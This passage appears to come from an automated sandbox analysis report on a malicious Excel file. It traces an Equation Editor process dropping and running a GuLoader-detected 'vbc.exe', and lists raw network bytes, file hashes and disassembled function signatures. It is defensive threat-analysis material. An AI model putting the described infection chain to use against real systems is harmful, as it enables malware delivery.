      Jul 20, 2021 14:02:41.582791090 CEST10INData Raw: de 5a 0f 0f 52 47 0f 62 00 e9 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 f5 f5 f5 23 1b 4f 0c ad cc c9 de 5a 0f 0f 3e fd ca 46 00 00 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70
      Data Ascii: ZRGbpppppppppppppppppppppppppppp#OZ>FpppppppppppppppppppppppppppppP>1Fppppppppppppppppppppppppppppppx#WWWGpppppppppppppppppppppppppppppppxGpppppppppppppppppppppppppppppppppxx773
      Jul 20, 2021 14:02:41.582817078 CEST11INData Raw: 4a 71 00 f9 f4 71 06 bf 88 71 5f 0c a0 71 62 d7 a4 71 e3 86 8e 71 d4 01 7c 71 39 fe df 71 9c d6 7f 71 7c 3c e8 71 3b db 9c 71 34 ef 9d 71 a5 e0 7d 71 75 21 d6 71 73 2f e8 71 b1 0a 71 71 46 c0 a1 71 5b 16 d4 71 71 24 f4 71 51 f8 df 71 e2 0a 25 71
      Data Ascii: Jqqq_qbqq|q9qq|<q;q4q}qu!qs/qqqFq[qq$qQq%qZqQqqq_qqqq]qTqqKqqq;qqbq@q*q3qqqqqX%qqd/qq^qqqnqqqqqq<qqqqbq(qq;q
      Jul 20, 2021 14:02:41.582909107 CEST13INData Raw: 15 15 6a 7b db db 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 a0 a0 0f 06 e9 da c0 18 82 3a a8 94 3b 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 70 a0 a2 4c 54 99 06 41 46 a4 3a ed 3c 3c 70 70 70 70 70 70 70 70 70 70 70 70 70
      Data Ascii: j{pppppppppppppppppp:;pppppppppppppppppppLTAF:<<ppppppppppppppppppppTTpppppppppppppppppppppp6ksppppppppppppppppppppppppkksppppppppppppppppppppppppppppppppppppppppppppppppppnpqvqqrqqrqqpqqpqq
      Jul 20, 2021 14:02:41.582931995 CEST14INData Raw: 8a 71 71 2f fb 71 a5 fd 73 71 33 ed 92 71 61 d2 a0 71 94 cb 03 71 40 c4 bf 71 5a 2b f7 71 99 c6 14 71 52 2f d0 71 71 1a fd 71 e8 90 8a 71 4b e5 af 71 97 cb 1f 71 e5 0a 02 71 40 f8 af 71 68 f7 df 71 24 24 24 24 24 24 24 24 24 24 24 24 24 24 0b 0b
      Data Ascii: qq/qsq3qaqq@qZ+qqR/qqqqKqqq@qhq$$$$$$$$$$$$$$$$$$$$$$$uutttt$$$$uuu~$$<72V'VGD$EEE,#(q32=/,,<gX%RRR=V,,kXkk}F|KRa8b-};;
      Jul 20, 2021 14:02:41.582957983 CEST16INData Raw: 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71 71
      Data Ascii: qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq


      Code Manipulations

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      Analysis Process: EXCEL.EXE PID: 2740 Parent PID: 584

      General

      Start time:14:01:44
      Start date:20/07/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13f960000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: EQNEDT32.EXE PID: 3020 Parent PID: 584

      General

      Start time:14:02:05
      Start date:20/07/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Chronological Activities

      Analysis Process: vbc.exe PID: 2536 Parent PID: 3020

      General

      Start time:14:02:07
      Start date:20/07/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:118784 bytes
      MD5 hash:C8FEB9D53B567CD1BFB0E59CF7D26BC2
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 100%, Joe Sandbox ML
      Reputation:low

      Chronological Activities

      Disassembly

      Code Analysis

      Reset < >

        Analysis Process: vbc.exe PID: 2536 Parent PID: 3020 vbc.exeCOMMON

        Executed Functions

        Function 00401128, Relevance: 7.9, APIs: 1, Strings: 3, Instructions: 945COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362112152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000006.00000002.2362108532.0000000000400000.00000002.00020000.sdmp Download File
        • Associated: 00000006.00000002.2362119626.0000000000415000.00000004.00020000.sdmp Download File
        • Associated: 00000006.00000002.2362123294.0000000000417000.00000002.00020000.sdmp Download File
        Similarity
        • API ID: #100
        • String ID: 1%nB$VB5!6&*$q
        • API String ID: 1341478452-1418848133
        • Opcode ID: 0bb2582355f795bb24e430a3c1cb97c7a51ba9a4cd9eece23b16decd8ea0fbc3
        • Instruction ID: d91c6dda3393b829e1e0181ca1c959403ab251d6e7d627793f2febcae7cdbe5c
        • Opcode Fuzzy Hash: 0bb2582355f795bb24e430a3c1cb97c7a51ba9a4cd9eece23b16decd8ea0fbc3
        • Instruction Fuzzy Hash: 7D5236614097C05EC70B4A348E2D2567F72AAA336679905FBC481BF1F3D1BE4886C76D
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D55D9, Relevance: 1.8, APIs: 1, Instructions: 258memorynativeCOMMON
        Download Yara Rule
        APIs
        • NtAllocateVirtualMemory.NTDLL ref: 003D5831
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 9f91272f6e657931e931bc11078f44329d0a32fed0546ca9402c6b910abdd505
        • Instruction ID: 9b4c859cfb81fc289a33c9d8d1eed792db24b767a2aa5253e05efdeeace1116e
        • Opcode Fuzzy Hash: 9f91272f6e657931e931bc11078f44329d0a32fed0546ca9402c6b910abdd505
        • Instruction Fuzzy Hash: 74918473A14788CFDB32DF65EC917DA7BA2EF99350F54004AE8988B311C331C9868B52
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D57A7, Relevance: 1.6, APIs: 1, Instructions: 73memorynativeCOMMON
        Download Yara Rule
        APIs
        • NtAllocateVirtualMemory.NTDLL ref: 003D5831
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 5cb0876ce9c7cf8b2980f8c56672f8649f987f5f4b06e06eac3a9bdd1736a751
        • Instruction ID: e39c77ec858e95834dc2d386b5a24bd8bc013764bc7c1be3207745215622e9bb
        • Opcode Fuzzy Hash: 5cb0876ce9c7cf8b2980f8c56672f8649f987f5f4b06e06eac3a9bdd1736a751
        • Instruction Fuzzy Hash: 4521B072611688CFEB71CF64EC80BD977A2EF89324F24451ADC4C9B220C730DA81DB05
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 003D8167, Relevance: 5.6, Strings: 4, Instructions: 559COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: K{:$k7DL$x )$x )
        • API String ID: 0-573531396
        • Opcode ID: cbbf0c4bff7bba9aa70f88f6d8d7e7a4481093a49bdb4e16a2b92185206b80a0
        • Instruction ID: a324a6466816f4126021452a5d67875afd49cb320dca7f34d854d2f8948d548e
        • Opcode Fuzzy Hash: cbbf0c4bff7bba9aa70f88f6d8d7e7a4481093a49bdb4e16a2b92185206b80a0
        • Instruction Fuzzy Hash: 663219715083C58FDB36CF38DC987DABBA2AF52320F59C29AC8998F296D7309541C716
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D6F7F, Relevance: 3.3, Strings: 2, Instructions: 766COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
        • Opcode ID: b1a142def564d13704610064d2668329b4fc718ac94f451c10cf0608110cb812
        • Instruction ID: 48740b54340ce10f4d33dd16683537a892f05847faed42369486fc563a337b02
        • Opcode Fuzzy Hash: b1a142def564d13704610064d2668329b4fc718ac94f451c10cf0608110cb812
        • Instruction Fuzzy Hash: A562FC726043899FDB759F38C9957DABBB2FF54350F51812EEC8A9B210C3719A81CB42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D379D, Relevance: 3.2, Strings: 2, Instructions: 675COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
        • Opcode ID: 85c739ecdf5e2649450aed2f0afb97fa872434a7ca6bbac8e0a00c5ceed23042
        • Instruction ID: def27e2141d15aa7c834df2ed5212d0af7e8495ab13ca4b196c9010b325edeff
        • Opcode Fuzzy Hash: 85c739ecdf5e2649450aed2f0afb97fa872434a7ca6bbac8e0a00c5ceed23042
        • Instruction Fuzzy Hash: EF52DB726043899FDB758F38D9957DABBA2FF54350F52812EDC899B210C3719A81CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D3917, Relevance: 3.2, Strings: 2, Instructions: 651COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa$\l9
        • API String ID: 0-2703591555
        • Opcode ID: 5897d5f9525e5ff67529982363bed710c20189dca9f061aac34544bf2a461cc2
        • Instruction ID: 3f855714ed432538c565aba5c6271955a72708364c48fb4240c77d8f6a39fbb6
        • Opcode Fuzzy Hash: 5897d5f9525e5ff67529982363bed710c20189dca9f061aac34544bf2a461cc2
        • Instruction Fuzzy Hash: 6B52DA726043899FDB758F38D9957DABBB2FF54350F52812EDC899B210C3709A91CB82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D2531, Relevance: 3.1, Strings: 2, Instructions: 587COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: $w!$k7DL
        • API String ID: 0-3053937184
        • Opcode ID: ce7b4ced9cb69c0ae2d8276d44fa1b1abdd014b5bb482de5084ef2cbc1d9c1a1
        • Instruction ID: 8bef5101c4d6fbdb1890ce32c8feef31743bac611fbf5f7c20d8c2740281ab95
        • Opcode Fuzzy Hash: ce7b4ced9cb69c0ae2d8276d44fa1b1abdd014b5bb482de5084ef2cbc1d9c1a1
        • Instruction Fuzzy Hash: 8432AD72A046859FDB75DF28DC91BDAB7A6FF99310F15812AEC4DDB310D730AA418B80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D09EF, Relevance: 3.0, Strings: 2, Instructions: 544COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: <$v].
        • API String ID: 2167126740-2854884050
        • Opcode ID: be7878d67aec070f92d5d86a1e4f74a9a4293870a558d9bf80648e44443528c3
        • Instruction ID: 582d5ac8e5c59baf2a671951b8b27563e8b4351e49914bfc992084c98745126a
        • Opcode Fuzzy Hash: be7878d67aec070f92d5d86a1e4f74a9a4293870a558d9bf80648e44443528c3
        • Instruction Fuzzy Hash: DE222472A043899FDB35AF29DC957EE77A2BF94340F56412EEC8D9B310D7309A818B41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D0974, Relevance: 2.9, Strings: 2, Instructions: 421COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID: <$v].
        • API String ID: 2167126740-2854884050
        • Opcode ID: 7fe7c3fa8050b8e3f3f3d4bdeb46fee88ce79b3c487b2e35c585092b65a3d3b9
        • Instruction ID: 1276541557740e1f55e865fb0ce03ac0a486837e29a6c253a4ad5a9c8242cdaf
        • Opcode Fuzzy Hash: 7fe7c3fa8050b8e3f3f3d4bdeb46fee88ce79b3c487b2e35c585092b65a3d3b9
        • Instruction Fuzzy Hash: 99F14472A083899FDF359F28DC947EE77A2AF99310F66802EDC4D9B311D7305A818B51
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D0CA7, Relevance: 2.8, Strings: 2, Instructions: 278COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: <$v].
        • API String ID: 0-2854884050
        • Opcode ID: 380995033ca2d2a78ba2da5c78a896b17875eba64858888362ff1d3e385490c1
        • Instruction ID: e75ac77cc0e609a62b37d3cddbbdd55166d5d0ba3c2d3e5d5645c6e21fe803cc
        • Opcode Fuzzy Hash: 380995033ca2d2a78ba2da5c78a896b17875eba64858888362ff1d3e385490c1
        • Instruction Fuzzy Hash: F8B11372A042989FDF399F24DC557EE37A2AF99340F26442EDC8D9B710D7305E418B86
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D37D8, Relevance: 1.7, Strings: 1, Instructions: 426COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: ZYa
        • API String ID: 0-34885360
        • Opcode ID: 478cf8f48f60a570b49276f411c99ab043c63a0e3cb50eb58cdfdc7a415b64a5
        • Instruction ID: cf4894d1dfcedab0dc2210df4e6181a685f77e640e93ba93421a4a2f2d982754
        • Opcode Fuzzy Hash: 478cf8f48f60a570b49276f411c99ab043c63a0e3cb50eb58cdfdc7a415b64a5
        • Instruction Fuzzy Hash: CD021CB26083499FCB659F39C9867DABBB2FF54350F42811DDC899B210C3749A91CF82
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D26CF, Relevance: 1.5, Strings: 1, Instructions: 287COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: $w!
        • API String ID: 0-603683437
        • Opcode ID: e324d9a4c9be31d3d070fa90b6bbe30ccf38e579462bd9735fa085e89faa0296
        • Instruction ID: 32bf2ad1af8bcc6ced9dc2daed644ea55e68c8f8031a6448cf1ca41f9311e723
        • Opcode Fuzzy Hash: e324d9a4c9be31d3d070fa90b6bbe30ccf38e579462bd9735fa085e89faa0296
        • Instruction Fuzzy Hash: DDC18D72A047499FDB69CF28DC80BDAB7A5FF58310F15422AEC5C9B710D770AA51CB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D4233, Relevance: 1.5, Strings: 1, Instructions: 245COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: \l9
        • API String ID: 0-3627828189
        • Opcode ID: 7d97025c4d4862bfdad767e76500197aa9fb947aa4e679721482c0cbe57551b3
        • Instruction ID: 5b6b6279bd7dd188f97f243ce55329bc84e08a8c1fe441e3ea95239376a5fcd0
        • Opcode Fuzzy Hash: 7d97025c4d4862bfdad767e76500197aa9fb947aa4e679721482c0cbe57551b3
        • Instruction Fuzzy Hash: DEB1C872600388DFDF769F38DD927DA3BA2FF58340F51412AED899A220C7315A91CB46
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D20EB, Relevance: 1.4, Strings: 1, Instructions: 178COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: d2537f0f5cac8d6bf64adb3c54f37ea4cd3cc62f5303651ca53f8d5a2b9fac4c
        • Instruction ID: 30bfaa09bc4dac0d75cb333e6d58e5e1004f11e52476c4bb844113a4f07be0aa
        • Opcode Fuzzy Hash: d2537f0f5cac8d6bf64adb3c54f37ea4cd3cc62f5303651ca53f8d5a2b9fac4c
        • Instruction Fuzzy Hash: C571CE726042889FCBB48E29DC557EB77E6AF98300F56851EEC4DCB314D3309A85CB05
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D2114, Relevance: 1.4, Strings: 1, Instructions: 175COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: ba5ee70da5d60e3ae9ebd1fae93dc955c432bed59ca8aa0d5e785172d1cb9890
        • Instruction ID: 1a9b4ce3e54ffefa0a287e5ee7be8bb9a9e66a20e213bd8b788e06c13aeac272
        • Opcode Fuzzy Hash: ba5ee70da5d60e3ae9ebd1fae93dc955c432bed59ca8aa0d5e785172d1cb9890
        • Instruction Fuzzy Hash: 0671BC726042889FDB788F299C557EBB7E6BF98340F16851EE84DCB350D7309A858B06
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D22A3, Relevance: 1.4, Strings: 1, Instructions: 134COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: Q@VF
        • API String ID: 0-1362175084
        • Opcode ID: 0dbdcf19282f8a6abaef3d2b8fced3dc2a864e5a07b77d20f64635a4e315b800
        • Instruction ID: 1cc8f2eb8903c1e7630fe92bfaa0317345d85f35838460a2f3d982cc5ca77507
        • Opcode Fuzzy Hash: 0dbdcf19282f8a6abaef3d2b8fced3dc2a864e5a07b77d20f64635a4e315b800
        • Instruction Fuzzy Hash: BD5189726042889FDB748F29DC54BDBBBE6AF98350F15842AEC4CCB314D730AA85CB05
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D34EA, Relevance: 1.4, Strings: 1, Instructions: 131COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID: eOu0
        • API String ID: 0-585871311
        • Opcode ID: 0487643cb0e193c6dfbc68a192f9b5d9da51906b836a91a544e3237f58f1d9e3
        • Instruction ID: d34ee714639616095a4c372c6dfccc40deda9a146327c422e97bc9c9c2d909e3
        • Opcode Fuzzy Hash: 0487643cb0e193c6dfbc68a192f9b5d9da51906b836a91a544e3237f58f1d9e3
        • Instruction Fuzzy Hash: B751E1B7601B449BDB75CE29D9917D776F2AF98B00F1A052ECC8E4B700D734AA40CB56
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D82CB, Relevance: .3, Instructions: 267COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d1f8a5bc73ca5d1118ee654b52e20776cecf655bbd5a0b663ff036f97900bd9b
        • Instruction ID: 5ebf6999e3efd6a8d1ac41b3412638790476a3b31a82b8a7c40681b9b4824008
        • Opcode Fuzzy Hash: d1f8a5bc73ca5d1118ee654b52e20776cecf655bbd5a0b663ff036f97900bd9b
        • Instruction Fuzzy Hash: 0CB1B2625083C58FDB36CF3888987967FE2AF56360F0AC29AC8994F2E6D7348545C716
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D7923, Relevance: .2, Instructions: 195COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: e570b341dbd2d183bddd43e3170f2d397914bf9c6c6587003f354dc18784ffb1
        • Instruction ID: cd9cc44412bf9e0f8c086f74dabc218d41e60343eb6443cd9c0eba677c02d08b
        • Opcode Fuzzy Hash: e570b341dbd2d183bddd43e3170f2d397914bf9c6c6587003f354dc18784ffb1
        • Instruction Fuzzy Hash: 9471F372A08654DFDB35DE28D8A17DA77E2AF54300F8A412FDC498B744E730AE81CB91
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D3063, Relevance: .2, Instructions: 157COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3a1e48a51e6f004e2d06c7405b6740208b3dc67a808fca918fe48b417bbd8576
        • Instruction ID: 2f1fbdecce1d88051f83f806ffd8a487284819fdb108e67c4ad112a972edb1e4
        • Opcode Fuzzy Hash: 3a1e48a51e6f004e2d06c7405b6740208b3dc67a808fca918fe48b417bbd8576
        • Instruction Fuzzy Hash: 3351FE32504340CFCB65AF34D989BEABBB6FF59350F56495DEC8A9B211C3309A818B42
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D1262, Relevance: .1, Instructions: 144COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c39aa16d6e13dad098edb465aff7ae88dc50fa2cd1edd7031f50b26cda80aa08
        • Instruction ID: eacef70d4e61669dcff0d7910fbfd3697386a1aacdf03b103957c22a7e27227d
        • Opcode Fuzzy Hash: c39aa16d6e13dad098edb465aff7ae88dc50fa2cd1edd7031f50b26cda80aa08
        • Instruction Fuzzy Hash: C751C276604249EFCB35AF38E9567EE3BB2BF44390F45051EEC8A9B250C7358A41CB41
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D854C, Relevance: .1, Instructions: 124COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9b75b37a6cdd9edaa3aa9f01531226495d095d289d260b96e37027190b8e30dd
        • Instruction ID: 82bf1dcdb76adf1bbf11ca2bf44bfe7cf6612a411f36311f892f79b9a5d06de0
        • Opcode Fuzzy Hash: 9b75b37a6cdd9edaa3aa9f01531226495d095d289d260b96e37027190b8e30dd
        • Instruction Fuzzy Hash: 0E513B729483858BCF39CF389CA47EA7BA2AF66310F19819FC85A8F385D7305641C725
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D8501, Relevance: .1, Instructions: 123COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9c6e16f4c1e885e282ab1d61bca15d0ffff5d86e62bc67ec6a707b3bc7d5ac1c
        • Instruction ID: 3b538b2a992af7af0339db5254fd4f915c2ee75f902fa63bcdcf4513da804a4f
        • Opcode Fuzzy Hash: 9c6e16f4c1e885e282ab1d61bca15d0ffff5d86e62bc67ec6a707b3bc7d5ac1c
        • Instruction Fuzzy Hash: 205119B29483858BCF39CF389CA47EA7BA2AF66350F55825FC85A8F385D7304541C725
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D0F9F, Relevance: .1, Instructions: 123COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: a8030d3165dabed5ae71850c5d6ca1c02360af4694ea2aa89313b0acb2c8a9bd
        • Instruction ID: b83287cdc91587da5fe27b37051b99b553a0e29843d4407a7769766dacc141b0
        • Opcode Fuzzy Hash: a8030d3165dabed5ae71850c5d6ca1c02360af4694ea2aa89313b0acb2c8a9bd
        • Instruction Fuzzy Hash: 98412572908258ABDF39AF34D8557EF37B2AF49300F15452EDC49AB355D7301A818B92
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D0FFE, Relevance: .1, Instructions: 113COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 2d2c9d0c2d214f13645b0f05905d59354b1d9b5cdce2d2e4a0e9a445196deb90
        • Instruction ID: d9edfee0d4523758b21d9552e9b0dd9be3aed6c03fe6f5aeaec90a6054836173
        • Opcode Fuzzy Hash: 2d2c9d0c2d214f13645b0f05905d59354b1d9b5cdce2d2e4a0e9a445196deb90
        • Instruction Fuzzy Hash: 06412772909358AFDB359F34DC067EF37B6AF4A300F16411EDC499B245D7700A418B96
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D1CBD, Relevance: .1, Instructions: 99COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID: AllocateMemoryVirtual
        • String ID:
        • API String ID: 2167126740-0
        • Opcode ID: 4ef9387518809eaacb984a23fa93b8f70dcef0da26c52fdcd5ec1983c33e78ca
        • Instruction ID: e8d2c670a41e595bf26ca01cf26b38195050b3354a06f853d07dc4937419a7c2
        • Opcode Fuzzy Hash: 4ef9387518809eaacb984a23fa93b8f70dcef0da26c52fdcd5ec1983c33e78ca
        • Instruction Fuzzy Hash: 4341F272A043899BDB30AF64DC85BDE77B6FF95380F458429EC889B312D3348A81CB55
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D330A, Relevance: .1, Instructions: 60COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3fd64fa94e57339830500fd1354d3c2557e256d4e71a6dc2a839401f1d190b0b
        • Instruction ID: 59bb7fb85adeca94938d5090c6458c805b5a7126fa24454cad7aa74d72a02b98
        • Opcode Fuzzy Hash: 3fd64fa94e57339830500fd1354d3c2557e256d4e71a6dc2a839401f1d190b0b
        • Instruction Fuzzy Hash: F021A6312087C18BDF72CEB8C8D4B86BA91AF46314F48C2ADC9984E6DBE2354543C752
        Uniqueness

        Uniqueness Score: -1.00%

        Function 003D54BA, Relevance: .0, Instructions: 48COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000006.00000002.2362099222.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
        Yara matches
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: acd64a3843bdfb710f3ec917ab0b35563eea504932bdc001ef303e66167dae7a
